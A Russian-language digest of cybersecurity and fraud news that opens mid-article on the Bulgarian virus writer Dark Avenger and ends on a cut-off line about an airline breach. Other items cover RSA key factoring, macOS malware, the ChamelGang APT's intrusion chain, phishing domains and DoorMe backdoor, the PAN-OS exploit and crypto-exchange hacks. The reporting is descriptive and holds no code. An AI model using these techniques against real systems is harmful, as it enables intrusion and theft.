С другой стороны, «антипод» Dark Avenger, первый болгарский специалист по компьютерной безопасности Веселин Бончев, который зачастую одним из первых сталкивался с творениями «Мстителя», не разделяет восторга по отношению к качеству кода софийского разрушителя. По его словам, Dark Avenger при всей своей изобретательности на грани гениальности совершал при написании кода немало ошибок и применял далеко не самые рациональные и оптимальные решения. Бончев заявлял, что «Мстителя» трудно назвать профессионалом, лишь любителем, хоть он и несомненно талантлив.
Из-за этих обидных заявлений Dark Avenger стал считать Веселина Бончева своим личным врагом. В код новых вирусов он включал разные оскорбительные высказывания в адрес Бончева… либо указывал его в качестве автора вирусов V2000 и V2100 вместо своего ника. Когда Веселин — уже в 1989 году возглавивший лабораторию компьютерной вирусологии при Болгарской академии наук — выпустил собственный антивирус — Dark Avenger написал контр-антивирус, специально предназначенный для поиска программ Бончева и принудительного выключения компьютера в случае их обнаружения.
Хуже того, «Мститель» написал программу UScan, которая заявляла о себе как об «универсальном антивирусном сканере», написанном Веселином Бончевым. На самом деле программа просто заражала все проверяемые файлы вирусом Anthrax от Dark Avenger.
Веселин Бончев, борец с вирусами и личный враг Dark Avenger
Dark Avenger стал «первой ласточкой». Его примеру последовали многие болгарские программисты. Уже в 1990-м году в Болгарии появилась первая BBS (VX BBS / Virus Exchange BBS), ориентированная на обмен (!) вирусами, а также предоставлявшую разнообразную информацию по их созданию для всех желающих. Библиотека, создателем которой называют Тодора Тодорова, также известного как Commander Tosh, имела милейшее правило: чтобы скачать себе вирус, нужно было загрузить в библиотеку какой-нибудь свой, и непременно с новым исходным кодом. Естественно, это изрядно подстегнуло развитие вирусописания в стране.
В начале 90-х каждый год из маленькой Болгарии в глобальный компьютерный мир уходили сотни вирусов. Уже в декабре 1990 года The New York Times называла Болгарию источником серьёзных угроз зарождавшейся глобальной цифровой экономике. Автор статьи даже заявил, что «болгары не просто пишут компьютерные вирусы, они пишут лучшие в мире компьютерные вирусы!». Джон МакАфи, создатель линейки одноимённых антивирусов, связывал с болгарскими вирусами до 10% всех заражений в США, причём в большинстве случаев он связывал заражения именно с творениями Dark Avenger. Звучали и куда более радикальные оценки, до четверти или даже до трети всех вирусов мира. Впрочем, это, видимо, уже преувеличение.
Внимание западной прессы и корпораций только подстёгивало болгарских программистов писать ещё больше всё более хитрых и крутых вирусов. В стране сложились целые неформальные сообщества любителей вирусов, где программисты соревновались друг с другом в создании всё более крутых, опасных или забавных программ. Да, заметная часть вирусов болгарского происхождения были не столько вредоносными, сколько шуточными. В каком-то смысле они продолжали традиции «Каскада»: к примеру, на экране могла внезапно появиться гусеничка, поедающая буквы. Традицией также стало срабатывание вируса под музыку — как во всё том же «каскаде».
В 1991 году Dark Avenger выпустил ещё одно знаменитое творение: MtE. Строго говоря, полноценным вирусом MtE не был. Зато это был первый в истории полиморфный генератор под MS-DOS для использования в вирусах всеми желающими. «Мститель из Софии» опубликовал его в виде объектного модуля с подробнейшей инструкцией по применению и генератором случайных чисел. Подробнее об этом можно почитать в одноимённом разделе тут.
Спустя год появился Peach: первый контр-антивирус, ответ на всё более массовое использование антивирусов, в создании которого подозревают всё того же Dark Avenger. Он «охотился» на Central Point Antivirus и удалял его базу данных ревизора изменений. Позже подобный подход «Мститель» попытается использовать против своего личного врага и антипода, борца с вирусами Веселина Бончева.
Личность Dark Avenger, несмотря на нанесённый его программами колоссальный ущерб и всемирную известность, по сей день остаётся тайной.
Веселин Бончев допускает, что однажды мог столкнуться с Dark Avenger вживую. Ему на анализ попал новый вирус болгарского происхождения под названием «The Number of the Beast» — по названию альбома Iron Maiden 1982 года. С одной стороны, вирус был написан очень изобретательно. Вирус маскировался от антиврусных программ, изображая драйвер устройства. Множество хитрых механизмов были вписаны всего лишь в 512 байт кода, что вкупе с названием указывало на «Мстителя». С другой — стиль написания кода заметно отличался от типичных творений Dark Avenger: код был профессионально выверенным, точным и лаконичным. Более того, в отличие от всех прочих вирусов «Мстителя», «Число зверя» был шуточным и не наносил реального ущерба заражённым машинам.
Посему Бончев решил, что автором вируса был не Dark Avenger. О чём — включая «слишком красивый и качественный код» — и упомянул на очередном выступлении в Софийском университете. После выступления к Веселину подошёл крайне возмущённый мужчина невысокого роста, и, «преодолевая застенчивость», разразился гневной тирадой о том, что Бончев ничего не понимает в программировании вирусов, и не должен сметь о них рассуждать перед гораздо более умным человеком — под которым явно подразумевал себя.
Спустя пару дней Бончев получил не менее возмущённое письмо на электронную почту, где автор — уже прямо представившись как Dark Avenger — назвал лекцию Веселина «вершиной идиотизма» и заявил: я, может, и уничтожаю чужую информацию, но хотя бы не делаю на вирусах деньги, как вы, так что вам бы стоило мне приплачивать как источнику вашему заработка. Впрочем, в 1991 году Бончев уехал работать в университет немецкого Гамбурга, и больше шансов встретиться с Dark Avenger ему не представилось.
Ну а заявить в полицию на подозрительную личность Бончев не мог, так как в то время в Болгарии попросту не было законов, запрещающих создание компьютерных вирусов. Их написание было фактически легальным. Что тоже объясняет размах увлечения этим делом среди болгарских программистов.

Ну а в 1993 году деятельность Dark Avenger внезапно прекратилась. Никаких посланий по этому поводу он не оставил, даже в коде вирусов.
Наиболее распространённой версией сейчас является предположение, что за ником Dark Avenger стоял уже упомянутый Тодор Тодоров, создатель и администратор Virus Exchange BBS. Говорят, впрочем, что Dark Avenger был завсегдатаем VX BBS под другим ником, и с ним там даже активно общались — но это было в настолько далёкие уже времена раннего IT, что достоверность подтвердить или опровергнуть такое крайне затруднительно.
Тодор Тодоров исчез из Болгарии и с VX BBS в 1993 году, одновременно с Dark Avenger. Знакомые утверждали, что он отправился в США то ли учиться, то ли работать. В 1996 году Тодоров вновь появился в Софии. А спустя год некий хакер, назвавший себя Dark Avenger, взломал компьютерную сеть Болгарской академии наук и Софийского университета.
Впрочем, личный враг «Мстителя» Веселин Бончев в это время работал уже в далёкой Исландии на FRISK Software International. Он вернётся в Болгарию и вновь возглавит Национальную лабораторию компьютерной вирусологии БАН только в 2005 году — в каковом качестве работает там и по сей день, уже как доктор наук. По ещё одной версии, настоящим Dark Avenger был… сам же Веселин Бончев. И это всё был хитрый план по раскрутке его личного бренда. Выглядит это весьма сомнительно.

Есть и третья версия, совсем уж экзотичная. В январе 1993 года американская исследовательница вирусов Сара Гордон опубликовала сенсационное интервью с Dark Avenger, которого по зловещести и психопатичности сравнила с Ганнибалом Лектером, и утверждала, что он её преследовал из романтических соображений. В нём «Мститель» якобы заявлял, что обожает уничтожение данных, но к этому времени начал раскаиваться в нанесённом его вирусами ущербе.
Впрочем, интервью даже на первый взгляд выглядит сомнительным, и явно написано человеком, имевшим слабое представление о реалиях Болгарии. К примеру, Dark Avenger утверждает, что якобы доступ к компьютерам в Болгарии имели только «высокопоставленные шишки» (компьютерные клубы ДКМС вышли из чата). Достоверность интервью до сих пор под вопросом — но некоторые предположили, что «Мстителем из Софии» была сама же Сара Гордон в рамках какого-то особо сложного и коварного социального эксперимента.
Впрочем, это всё ещё более сомнительно, чем содержание интервью. Более-менее известно одно: после взлома компьютерной сети болгарских учёных следы Dark Avenger теряются окончательно. Бум увлечения вирусописанием среди болгарских программистов к концу 90-х тоже сошёл на нет: экономика пошла в рост, спрос на айтишников вырос, законы стали карать хакеров и создателей вирусов — ну и в целом «ушла эпоха».
Теперь про Dark Avenger и грозные болгарские вирусы, за которые даже в 1997 году Болгарию некоторые американские публикации всё ещё называли «Сердцем Тьмы», помнят разве что специалисты и энтузиасты. Sie transit gloria mundi!
souce: habr
Женщина в Москве перевела мошеннику, который представился сотрудником банка,
более 7,9 млн рублей. Возбуждено уголовное дело. Об этом ТАСС в субботу
сообщили в пресс-службе столичного ГУ МВД России.
"Вечером 14 апреля на телефон женщине позвонил неизвестный и, представившись
сотрудником банка, под предлогом сохранения денег убедил ее обналичить со
своего банковского счета 7 млн 937 тыс. рублей, а затем несколькими
транзакциями перевести на неустановленный банковский счет", - сказал
собеседник агентства.
По данному факту возбуждено уголовное дело о мошенничестве (ч. 4 ст. 159 УК
РФ). Злоумышленнику может грозить лишение свободы на срок до 10 лет со штрафом
в размере до 1 млн рублей.
Ключи RSA, которые генерирует устаревший криптомодуль библиотеки SafeZone, можно легко вычислить, используя алгоритм факторизации Ферма. Благодаря этому открытию исследователь Ханно Бёк (Hanno Böck) смог выявить новую уязвимость в принтерах Canon и Fuji Xerox.
Специалисты по криптографии давно удостоверились, что выбор близких друг к другу простых чисел при создании RSA-ключей (к примеру, представления содержат по 500 одинаковых верхних битов) позволяет без особого труда найти эти множители по методу факторизации, предложенному Пьером Ферма в 1643 году. Если же оба случайных простых числа (их обычно обозначают как p и q) генерируются независимо, велика вероятность, что такой способ взлома окажется провальным.
Что касается решения SafeZone, то оно изначально не обеспечивало большой криптостойкости, и его [перестали](https://arstechnica.com/information- technology/2022/03/researcher-uses-600-year-old-algorithm-to-crack-crypto- keys-found-in-the-wild/) рекомендовать для использования. Однако с переходом разработчика (Inside Secure) под крыло ИТ-компании Rambus в 2019 году проект получил новую жизнь — в доработанном виде эти криптобиблиотеки сейчас продаются под новым брендом как FIPS Security Toolkit.
Тем не менее, Бёку удалось найти случаи использования криптомодулей SafeZone устаревших версий. Проверяя надежность публичных ключей RSA из своей обширной коллекции, исследователь обнаружил несколько образцов, легко подающихся взлому.
В частности, применение алгоритма факторизации Ферма позволило обнаружить слабость криптоключей, которые используют для TLS-связи некоторые принтеры Fujifilm (ранее Fuji Xerox) и Canon. Уязвимости, выявленной в ходе исследования, был присвоен идентификатор CVE-2022-26320, Fujifilm уже выпустила обновленные прошивки.
Бёк также нашел на SKS-серверах четыре уязвимых ключа PGP, но они имели пользовательский ID, то есть были созданы явно с целью тестирования.
В 2021 году на ландшафте киберугроз появились восемь новых семейств вредоносных программ, заточенных под операционную систему macOS. Такой статистикой поделился Патрик Уордл, специализирующийся на кибербезопасности «яблочной» десктопной ОС.
Вот эти восемь новичков: ElectroRAT, SilverSparrow, XcodeSpy, ElectrumStealer, WildPressure, XLoader, ZuRu и CDDS (другое имя — MacMa). Уордл опубликовал в блоге информацию по каждому из перечисленных вредоносов и даже выложил семплы зловредов, чтобы другие исследователи тоже смогли их «пощупать».
ElectroRAT — кросс-платформенный троян, появившийся в самом начале 2021 года и обеспечивающий операторам удалённый доступ к компьютеру жертвы. Его задача — украсть криптовалюту пользователей. Этот вредонос распространяется с помощью аналогичного софта и способен снимать скриншоты, записывать нажатия клавиш, загружать и выгружать файлы и выполнять команды.
SilverSparrow обнаружили в феврале. Несмотря на то что вредонос прямо или косвенно затронул около 30 тыс. устройств на macOS, он до сих пор остаётся достаточно странным зловредом, поскольку эксперты не понимают, как он распространяется.
XcodeSpy появился в марте и был изначально нацелен на разработчиков софта. Вредонос попадает на устройства жертв с помощью злонамеренных проектов Xcode, а после устанавливает бэкдор EggShell.
ElectrumStealer тоже был зафиксирован в марте, он также охотится на криптовалютные кошельки пользователей. С этой вредоносной программой связан интересный момент — Apple случайно «легитимизировала» ElectrumStealer.
WildPressure возник на ландшафте в июле и уже тогда атаковал промышленные предприятия на Среднем Востоке. Операторы WildPressure стартовали свои кампании в мае 2019-го, однако на тот момент они специализировались преимущественно на Windows.
XLoader — ещё один кросс-платформенный вредонос в подборке Уордла. По словам специалистов, это macOS-версия зловреда Formbook и его основная цель — воровать пароли.
ZuRu отметился в сентябре на территории Китая. Злоумышленники распространяют этот вредонос через поисковую выдачу Baidu. ZuRu демонстрирует навязчивую рекламу и доставляет на компьютер жертвы дополнительные трояны.
CDDS (MacMa) — последний зловред из списка, на него вышли эксперты Google. Хорошо подготовленная киберпреступная группировка использовала уязвимость нулевого дня в macOS для доставки CDDS гражданам Гонконга.
Представители Европола сообщают об аресте 1803 денежных мулов, а также о выявлении 18 351 лиц, занимающихся подобной деятельностью, в результате международной операции по борьбе с отмыванием денег EMMA 7. Как можно понять по названию, это не первая операция такого рода, первая EMMA была проведена еще в 2016 году.
Операция проводилась в сотрудничестве с правоохранительными органами 27 стран мира в период с 15 сентября по 30 ноября 2021 года. В борьбе с отмыванием денег участвовали: Австралия, Австрия, Бельгия, Болгария, Колумбия, Чешская Республика, Эстония, Финляндия, Греция, Германия, Гонконг, Венгрия, Ирландия, Италия, Молдова, Нидерланды, Польша, Португалия, Румыния, Сингапур, Словацкая Республика, Словения, Швеция, Швейцария, Испания, Великобритания и США.
За два с половиной месяца было проведено 2503 отдельных расследований. Сообщается, что в целом операция предотвратила убытки в размере 76,5 млн долларов США, остановив или отменив около 7000 мошеннических транзакций в 400 финансовых учреждениях.
На этот раз большинство расследований в рамках EMMA 7 было сосредоточено на международном феномене отмывания денег и привели к выявлению 324 рекрутеров. Напомню, что денежными мулами называют людей, которые получают и переводят деньги от имени злоумышленников, тем самым помогая им отмывать украденные суммы (в обмен на небольшую долю).
«Организованные преступные группы вербуют мулов, нацеливаясь на такие группы, как студенты, иммигранты и люди, находящиеся в бедственном экономическом положении. Им предлагают легкие деньги через законно выглядящие объявления о работе и сообщения в социальных сетях, — пишут представители Европола. — Незнание не является оправданием, когда дело доходит до закона и отмывания денег; они нарушают закон, отмывая незаконные доходы от преступлений».
• Source: europol.europa.eu/newsroom/news/european-money-mule-action-leads- to-1-803-arrests
Сотрудники полиции пресекли деятельность киберпреступников, которые под видом сотрудников службы безопасности банков звонили гражданам, в результате чего похитили с их банковских счетов более 150 млн рублей, сообщила официальный представитель МВД России Ирина Волк.
«Сотрудниками ГУ МВД России по Ростовской области в результате оперативно- разыскных мероприятий и следственных действий, проводимых в рамках уголовных дел, возбужденных по признакам преступлений, предусмотренных статьей 159 и пунктом «г» части третьей статьи 158 УК РФ, установлены четверо участников преступного сообщества, специализирующегося на мошенничествах и кражах с банковских счетов граждан дистанционным способом», — сказала она.
По словам Волк, криминальная организация координировала действия трех структурированных групп, у каждого участника была своя роль, которая четко контролировалась. Так, одну группу составляли работники кол-центра, которые звонили гражданам под видом представителей службы безопасности банка и сообщали заведомо ложные сведения об операциях по их счетам. Еще две группы занимались обеспечением беспрепятственного перечисления денег со счетов потерпевших на счета и кошельки различных интернет-магазинов. В дальнейшем собранные средства переводились через криптокошельки в криптовалюту. За свою работу соучастники получали часть дохода с похищенных сумм.
«В настоящее время задержаны трое жителей Московской, Калининградской и Новосибирской областей в возрасте от 28 до 62 лет. Установлены 1 026 фактов противоправной деятельности. Предварительная сумма ущерба превышает 150 миллионов рублей», — уточнила Волк.
Следователем ГУ МВД России по Ростовской области возбуждено уголовное дело по статье 210 УК РФ («Организация преступного сообщества или участие в нем»). Трех фигурантов арестовали, их сообщника – гражданина одного из государств ближнего зарубежья – объявили в розыск.
• Source: мвд.рф/news/item/26678343
Разработчики решения Polygon рассказали о причинах обновления сети в начале месяца. Оказалось, что была обнаружена уязвимость, ставящая под угрозу 9.2 млрд токенов MATIC.
[В статье](https://blog.polygon.technology/all-you-need-to-know-about-the- recent-network-upgrade/) разработчики решения для масштабирования Эфириума пишут, что уязвимость была обнаружена «белым хакером» в основном контракте Polygon и потенциально могла привести к краже 9.2 млрд токенов MATIC ($24 млрд по текущему курсу). При этом общее количество токенов составляет 10 млрд, поэтому хакеры могли получить в свое распоряжение почти все монеты.
«Белый хакер» под псевдонимом Leon Spacewalker [сообщил об уязвимости](https://medium.com/immunefi/polygon-lack-of-balance-check-bugfix- postmortem-2-2m-bounty-64ec66c24c7d) разработчикам через платформу Immunefi. Команда Polygon провела тестирование и подтвердила наличие уязвимости. Было решено провести обновление основной сети, однако сперва разработчики обновили тестовую сеть Mumbai.
Пока разработчики тестировали исправление уязвимости в сети Mumbai, ошибку обнаружил другой хакер, в этот раз уже далеко не «белый». Ему удалось вывести 801 601 токен MATIC (около $2 млн по текущему курсу). После этого уже второй «белый хакер» сообщил об уязвимости команде Polygon.
Разработчики провели срочное обновление основной сети 5 декабря.
Разработчики Polygon наградили «белых хакеров», сообщивших об уязвимости. Leon Spacewalker получил стейблкоины на $2.2 млн, а второй хакер получил 500 000 токенов MATIC ($1.27 млн). Технический директор Immunefi Дункан Таунсенд (Duncan Townsend) отметил:
«Реакция команды Polygon на обнаружение уязвимости была быстрой и эффективной. То, что инцидент завершился удачно и без больших потерь, говорит о профессионализме разработчиков. Тесная координация с валидаторами Polygon помогла предотвратить серьезные потери».
[ сорец: https://publications.cispa.saarland/3507/ ]
Modern operating systems fundamentally rely on the strict isolation of user applications from the kernel. This isolation is enforced by the hardware. On Intel CPUs, this isolation has been shown to be imperfect, for instance, with the prefetch side-channel. With Meltdown, it was even completely circumvented. Both the prefetch side channel and Meltdown have been mitigated with the same software patch on Intel. As AMD is believed to be not vulnerable to these attacks, this software patch is not active by default on AMD CPUs. In this paper, we show that the isolation on AMD CPUs suffers from the same type of side-channel leakage. We discover timing and power variations of the prefetch instruction that can be observed from unprivileged user space. In contrast to previous work on prefetch attacks on Intel, we show that the prefetch instruction on AMD leaks even more information. We demonstrate the significance of this side channel with multiple case studies in real-world scenarios. We demonstrate the first microarchitectural break of (fine-grained) KASLR on AMD CPUs. We monitor kernel activity, e.g., if audio is played over Bluetooth, and establish a covert channel. Finally, we even leak kernel memory with 52.85 B/s with simple Spectre gadgets in the Linux kernel. We show that stronger page table isolation should be activated on AMD CPUs by default to mitigate our presented attacks successfully.
Item Type:| Conference or Workshop Item (A Paper) (Paper)
---|---
Divisions:| Michael Schwarz
(MS)
Conference:| USENIX-Security Usenix Security Symposium
Depositing User:| Michael Schwarz
Date Deposited:| 12 Oct 2021 19:50
Last Modified:| 12 Oct 2021 19:50
Primary Research Area:| NRA3: Threat Detection and
Defenses
URI:| https://publications.cispa.saarland/id/eprint/3507
Минфин США обвинил финансового директора международной медиакомпании Epoch Times Билла Гуаня в организации схемы по отмыванию не менее $67 млн незаконно полученных средств через криптовалюты.
Согласно материалам дела, с 2020 по май 2024 года Гуань создал в одном из офисов фирмы команду Make Money Online. Ее члены приобретали за криптовалюты полученные от различных преступлений средства с дисконтом в 20-30% и переводили их на предоплаченные дебетовые карты.
Для открытия банковских счетов и криптокошельков на неназванных торговых платформах участники схемы использовали украденные персональные данные.
По утверждению обвинения, в период осуществления нелегальных операций годовой доход Epoch Times вырос, судя по отчетности, с $15 млн до $62 млн. На банковские запросы касательно увеличения числа транзакций Гуань сообщал, что средства получены медиакомпанией в качестве пожертвований.
В совокупности за сговор с целью отмывания денег и два пункта банковского мошенничества фигуранту грозит максимальное наказание 80 лет тюрьмы.
Дело передано в суд.
justice[.]gov/usao-sdny/pr/chief-financial-officer-multinational-media- company-charged-participating-scheme
«Следователем Управления по расследованию организованной преступной деятельности Следственного департамента МВД России окончено предварительное расследование уголовного дела в отношении десяти фигурантов. В зависимости от роли и степени участия они обвиняются в совершении преступлений, предусмотренных статьями 210 и 159 УК РФ», – сообщила официальный представитель МВД России Ирина Волк.
Криминальная организация состояла из семи структурных подразделений. «Административное» располагалось в Казани, шесть «региональных» – на территории различных субъектов Российской Федерации.
По имеющимся данным, с 2018 по 2021 год соучастники путем обмана похитили свыше 209 миллионов рублей, полученных от вкладчиков интернет-проекта «Финико».
«Следствием изучен большой объем документов, изъятых в ходе более 100 обысков и приобщенных в качестве вещественных доказательств, допрошено свыше 1000 свидетелей, проведены экспертизы.
Уголовное дело, состоящее из 342 томов, с утвержденным Первым заместителем Генерального прокурора Российской Федерации обвинительным заключением направлено в Вахитовский районный суд Казани для рассмотрения по существу.
Предварительное следствие в отношении иных организаторов указанного интернет- проекта, в том числе объявленных в международный розыск и заочно арестованных, продолжается», – рассказала Ирина Волк.
Специалисты экспертного центра безопасности Positive Technologies выявили новую, ранее неизвестную APT-группировку, получившую название ChamelGang. Основными ее целями в России пока являются организации топливно- энергетического комплекса и авиационной промышленности, а интерес злоумышленников направлен на хищение данных из скомпрометированных сетей. Первые атаки группы типа trusted relationship были зарегистрированы в марте 2021 года.
«Сам по себе факт атаки не является чем-то уникальным: предприятия этой сферы входят в тройку наиболее часто атакуемых отраслей. При этом наиболее часто такие атаки приводят к потере данных или финансов — в 84% случаев злоумышленники в прошлом году нацеливались именно на хищение информации, — поясняет Денис Кувшинов, руководитель отдела исследования угроз ИБ Positive Technologies. — Промышленные предприятия далеко не всегда способны самостоятельно выявить целенаправленную кибератаку и на протяжении многих лет могут оставаться в иллюзии безопасности, рассматривая вероятность реализации недопустимых событий как минимальную. Однако на практике злоумышленник более чем в 90% случаев может проникнуть в корпоративную сеть промышленного предприятия, и почти каждое такое проникновение приводит к полному контролю над инфраструктурой целевой организации. Результатом более половины таких атак становится совершение того самого недопустимого события — хищение данных о партнерах и сотрудниках компании, почтовой переписки и внутренней документации».
Команда по реагированию на инциденты ИБ экспертного центра безопасности Positive Technologies при проведении расследований в российских компаниях топливно-энергетического и авиапромышленного секторов обнаружила новую киберпреступную группировку ChamelGang, использующую актуальный сегодня тип атак — trusted relationship.
Так, для получения доступа в сеть целевого предприятия в первом случае группа скомпрометировала дочернюю организацию, используя уязвимую версию веб- приложения на платформе с открытым исходным кодом JBoss Application Server. Проэксплуатировав уязвимость CVE-2017-12149 , закрытую поставщиком Red Hat более четырех лет назад, хакеры получили возможность удаленного исполнения команд на узле. Спустя две недели (что, по оценке экспертов Positive Technologies, очень быстро) группа смогла скомпрометировать головную компанию: злоумышленники узнали словарный пароль локального администратора на одном из серверов в изолированном сегменте и проникли в ее сеть по протоколу RDP. Оставаясь необнаруженными, атакующие находились в корпоративной сети в течение трех месяцев; изучив ее, они получили контроль над большей ее частью, включая критически важные серверы и узлы в разных сегментах. Как показало расследование, APT-группировку интересовали данные, которые им и удалось похитить.
Во втором случае для проникновения в инфраструктуру злоумышленники воспользовались цепочкой связанных уязвимостей в Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) — ProxyShell. О ней стало известно в публичном поле в августе этого года, и за прошедшие полтора месяца она активно эксплуатировалась различными АРТ-группами . Злоумышленники получили доступ к почтовым серверам компании использовав бэкдор, который на момент атаки не определялся большинством антивирусных решений. Как и в первом случае, группировка была нацелена на хищение данных, однако оперативное обнаружение APT-группы и противодействие ей позволило предотвратить хищение данных: злоумышленники присутствовали в инфраструктуре атакованной организации всего восемь дней и значимого ущерба нанести не успели.
Отличительной особенностью атак группы ChamelGang является использование нового, ранее никем не описанного вредоносного ПО — ProxyT, BeaconLoader, бэкдора DoorMe. Последний относится к пассивным бэкдорам, что значительно усложняет его обнаружение. Кроме того, в своем инструментарии группа имеет и уже известные вредоносные программы, в частности FRP, Cobalt Strike Beacon, Tiny shell.
«Среди обнаруженных нами образцов ВПО самый интересный — бэкдор DoorMe. По сути, он является нативным модулем IIS, который регистрируется как фильтр, через который проходит обработка HTTP-запросов и ответов. Его принцип работы нераспространенный: бэкдор обрабатывает только те запросы, в которых задан верный параметр cookie. На момент расследования инцидента DoorMe не детектировался средствами антивирусной защиты, и хотя техника установки этого бэкдора известна, за последнее время мы впервые видим ее использование, — отмечает Денис Гойденко, руководитель отдела реагирования на угрозы ИБ Positive Technologies. — Бэкдор дает злоумышленникам довольно широкие возможности в захваченных системах: он способен выполнять команды посредством cmd.exe и создания нового процесса, записывать файлы двумя способами и копировать метки времени. В общей сложности реализовано шесть различных команд».
Свое название ChamelGang (от англ. chameleon) группировка получила за использование правдоподобных фишинговых доменов и особенностей операционных систем для маскировки вредоносного ПО и сетевой инфраструктуры. Например, злоумышленники регистрируют фишинговые домены, имитирующие легитимные сервисы крупных международных компаний — Microsoft, TrendMicro, McAfee, IBM и Google, — в том числе их сервисы поддержки, доставки контента и обновлений. В ходе изучения активности группировки специалисты PT ESC обнаружили домены newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com. Также на своих серверах APT-группа размещала SSL- сертификаты, которые имитировали легитимные (github.com, www.ibm.com , jquery.com, update.microsoft-support.net).
Эксперты Positive Technologies пока не отнесли ChamelGang к какой-либо конкретной стране. Помимо того, что APT-группировка нацелена на ТЭК и авиационную промышленность России, ее жертвами, согласно полученным данным, также стали учреждения в десяти странах, в числе которых Индия, Непал, США, Тайвань, Япония и Германия. При этом в некоторых странах специалисты PT ESC обнаружили скомпрометированные правительственные серверы. Все пострадавшие компании получили уведомления по линии национальных CERT.
• Мастера маскировки: новая группировка ChamelGang и ее арсенал: <https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/new-apt- group-chamelgang/>
Власти Китая всегда выступают против хакерских атак в сети, поэтому подобные заявления со стороны Великобритании — это клевета
Представитель МИД КНР Хуа Чуньин на брифинге в четверг назвала заявления министра иностранных дел Британии Доминика Рааба о причастности Китая к хакерским атакам в киберпространстве клеветой, «лишенной какого-либо фактического обоснования».
По словам дипломата, власти Китая всегда выступают против хакерских атак в сети, поэтому подобные заявления со стороны Великобритании — это клевета. Хуа подчеркнула, что политизация данной проблемы не принесет пользы мировому сообществу. Китай всегда стремился к обеспечению безопасности в киберпространстве путем диалога к другими странами.
Китайская сторона неоднократно подчеркивала, что вызов кибербезопасности разделяют все. Подход к кибербезопасности через призму политики и идеологии не способствует ее повышению, подрывает взаимное доверие и отравляет атмосферу для международного сотрудничества в киберпространстве.
Как ранее сообщалось , министр иностранных дел Великобритании Доминик Рааб заявил, что «авторитарный Китай» осуществляет кибершпионаж с помощью цифровых технологий. По его словам, в число таких «авторитарных режимов» также входят Россия, Северная Корея и Иран.
Критическая уязвимость брандмауэраPAN-OS компанииPalo Alto Networks обзавелась рабочим эксплойтом и теперь активно реализуется в атаках, а меры по смягчению оказались неэффективными.
Как ранее мы сообщали, CVE-2024-3400 может позволить неаутентифицированным злоумышленникам выполнять произвольный код под root посредством внедрения команд в атаках низкой сложности наPAN-OS 10.2, PAN-OS 11.0 и PAN-OS 11.1.
Через день после того, какPalo Alto Networks начала выпускать исправления для CVE-2024-3400,watchTowr Labs также опубликовала [подробный анализ уязвимости](https://labs.watchtowr.com/palo-alto-putting-the-protecc-in- globalprotect-cve-2024-3400/) и экспериментальный эксплойт, который можно использовать на непропатченных брандмауэрах.
И это при том, что исследователи обнаружили более 82 000 уязвимых для атак CVE-2024-34000 экземпляров, 40% из которых находились вСША.
Рабочим эксплойтом, позволяющим загрузить файл конфигурации брандмауэра, поделилисьTrustedSec, которые обнаружили его в ходе расследования реальных атак, позволяющим злоумышленникам загрузить файл конфигурации брандмауэра.
Кроме того,Palo Alto Networksвыяснили, что ранее опубликованные меры по устранению последствий оказались неэффективными для защиты устройств от уязвимости.
Заявленное отключение телеметрии в реальности не позволяет защититься от атак, работает только лишь последнее обновление программного обеспеченияPAN-OS.
Бывший старший инженер по кибербезопасности американской IT-компании Шакиб Ахмед признал себя виновным во взломе двух децентрализованных криптобирж и хищении цифровых активов на сумму свыше 12,3 миллиона долларов.
По данным следствия прокураторы США, первой жертвой 34-летнего хакера стала биржа, именуемая в материалах дела «Crypto Exchange». 2-3 июля 2022 года Ахмед воспользовался уязвимостью в одном из смарт-контрактов, чтобы получить завышенную комиссию на сумму около $9 млн. После этого хакер предложил администрации биржи вернуть похищенные активы (за исключением 1,5 млн долларов) в обмен на неразглашение информации о взломе правоохранительным органам.
Спустя несколько недель, 28 июля, он атаковал еще один децентрализованный сервис - протокол Nirvana Finance, торговавший криптотокеном ANA. С помощью флеш-кредита на $10 млн Ахмед купил пакет монет ANA по заниженной цене, затем перепродал платформе по завышенному курсу и получил $3,6 млн нелегальной прибыли.
Nirvana готова была выплатить хакеру до $600 тыс. за сообщение об уязвимости, но он потребовал $1,4 млн. Не договорившись, злоумышленник похитил все средства, что привело к закрытию платформы.
Для сокрытия следов мошенник использовал сложные финансовые схемы, включая конвертацию крипты в анонимную Monero, кросс-чейн переводы, зарубежные биржи и миксеры. Несмотря на это, его удалось разоблачить.
Ахмед признал вину в компьютерном мошенничестве, он согласился на конфискацию похищенных активов на сумму $12,3 млн., а также вернут потерпевшим $5 млн. Ему грозит до 5 лет тюрьмы, приговор будет оглашен 13 марта 2024 года.
source: justice[.]gov/usao-sdny/pr/former-security-engineer-international- technology-company-pleads-guilty-hacking-two
Как админ Роскосмоса поставил под угрозу безопасность оборонного предприятия своими действиями?
В Кировском районном суде Самары вынесен приговор администратору информационной безопасности одного из предприятий Роскосмоса, обвиняемому в нарушении правил работы с информационными ресурсами, поставив под угрозу безопасность центра обработки данных оборонного предприятия. Суд признал его виновным по части 1 статьи 272 УК РФ (неправомерный доступ к компьютерной информации) и назначил ему полтора года условно с испытательным сроком два года.
По данным следствия, в 2022 году обвиняемый, будучи администратором информационной безопасности на предприятии, подключил свой рабочий компьютер к интернету и скачал из открытых источников программное обеспечение FreeRADIUS, которое он установил на сервере системы контроля доступа Cisco Secure ACS. Эта система была использована для организации безопасного доступа к информационным ресурсам предприятия, в том числе к объектам критической информационной инфраструктуры (КИИ).
Следствие считает, что таким образом обвиняемый нарушил правила работы с информационными ресурсами, поставив под угрозу безопасность центра обработки данных оборонного предприятия. По версии ФСБ, он мог дать возможность злоумышленникам получить доступ к конфиденциальной информации или провести атаку на сервер.
Обвиняемый не признает свою вину и утверждает, что он действовал в интересах работодателя, так как система Cisco Secure ACS была устаревшей и дорогостоящей в обслуживании. Он заявляет, что он сэкономил предприятию почти 2,5 миллиона рублей за лицензию и поддержку программного обеспечения. Он также уверяет, что он предпринял все необходимые меры безопасности при подключении к интернету и использовании бесплатного ПО.
Суд не учел эти доводы и основался на показаниях свидетелей, в том числе начальника обвиняемого, который дал ему задание найти замену системе Cisco Secure ACS. Суд также принял во внимание заключения экспертов, которые подтвердили наличие угрозы для безопасности информационных ресурсов предприятия.
source: kirovsky-- sam.sudrf.ru/modules.php?name=sud_delo&name_op=case&_id=2796514 58&_uid=a8aaa2ce-0262-4641-b276-7d33e022f7c9&_deloId=1540006&_caseType=0&_new=0&_d oc=1&srv_num=
В руки злоумышленников попали данные 5 миллионов клиентов и всех сотрудников
авиакомпании.
